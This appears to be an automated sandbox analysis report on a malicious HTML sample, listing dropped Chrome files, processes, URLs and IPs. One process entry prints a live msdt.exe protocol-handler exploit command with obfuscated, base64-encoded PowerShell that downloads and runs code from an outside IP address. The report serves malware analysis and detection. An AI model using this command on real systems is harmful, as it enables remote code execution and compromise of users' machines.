Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
exploit.htm
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\05e43bd7-e282-41fc-97ee-16ea21d374ca.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\0f227726-e0e7-4c58-8c81-54168ba76675.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\1eb7cf02-26dd-438e-a58f-48fd3e4252ca.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\2a492a07-07aa-4494-9bec-a88c477206ea.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\333d0aa2-a51f-4504-ae44-a16e0306df6c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\376f6551-872a-432e-8d3a-47e4613c647a.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\3c121f27-8d05-48e6-92ee-ca81bf9fd8ee.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\61ba8136-eed9-4230-8009-242c3a646d63.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\75212abf-18c0-41d0-a998-563b5dd034b8.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\7b7a6954-2ab6-4276-adc5-5e1bd0650254.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\8d2bdfdf-fa6f-4198-b09e-e386d51ff1e5.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\8ef717b8-5e67-450e-a0ba-377c84610f30.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\04feef38-3821-409d-b560-1f5251bf45a3.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\18f6875a-0bf4-414d-bd0f-31c7cf600456.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\29df2fb5-9b4e-4c8a-9519-537d61e8d6db.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\357e9c60-d26b-4075-9c9f-8c2bbefc21d1.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4c1bbe95-72bd-4caf-80c4-9417deeea171.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9a8e6291-b63a-4adb-94f5-12965367740f.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\4209d767-871b-4a94-8545-161148c1f1df.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\4a64c5b0-4134-42a3-ade2-28be8b61b6ac.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\49e038e6-1365-429c-94f4-db117dc07b92.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a5e1b249-4595-42a1-9ef0-54478bd42563.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\df93528a-7e79-4f8f-833e-9c31b4fdae72.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir2508_1875236186\Ruleset
Data
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\dc5328c0-6267-4ee7-836e-0f1633cc64bb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ec71354c-585c-4a2a-934f-3d788fa3d6aa.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1309084964\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1309084964\download_file_types.pb
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1309084964\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1309084964\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\manifest.fingerprint
|
ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\2508_1416056523\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_461848703\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_461848703\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_461848703\crl-set
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_461848703\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_461848703\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_525662352\Filtering Rules
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_525662352\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_525662352\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_525662352\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_584457100\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_584457100\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_584457100\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_584457100\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_821393512\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_821393512\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_821393512\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_821393512\ssl_error_assistant.pb
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_897717929\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_897717929\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2508_897717929\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\c0c16f7d-4a0f-4b81-a5b2-9ffbd1fd869b.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp
|
Google Chrome extension, version 3
|
dropped
|
There are 135 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.htm
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://play.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.203.110
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
172.217.168.45
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://easylist.to/)
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://creativecommons.org/compatiblelicenses
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://github.com/easylist)
|
unknown
|
||
|
https://creativecommons.org/.
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc
|
142.250.203.110
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
172.217.168.45
|
||
|
clients.l.google.com
|
142.250.203.110
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.168.45
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.203.110
|
clients.l.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
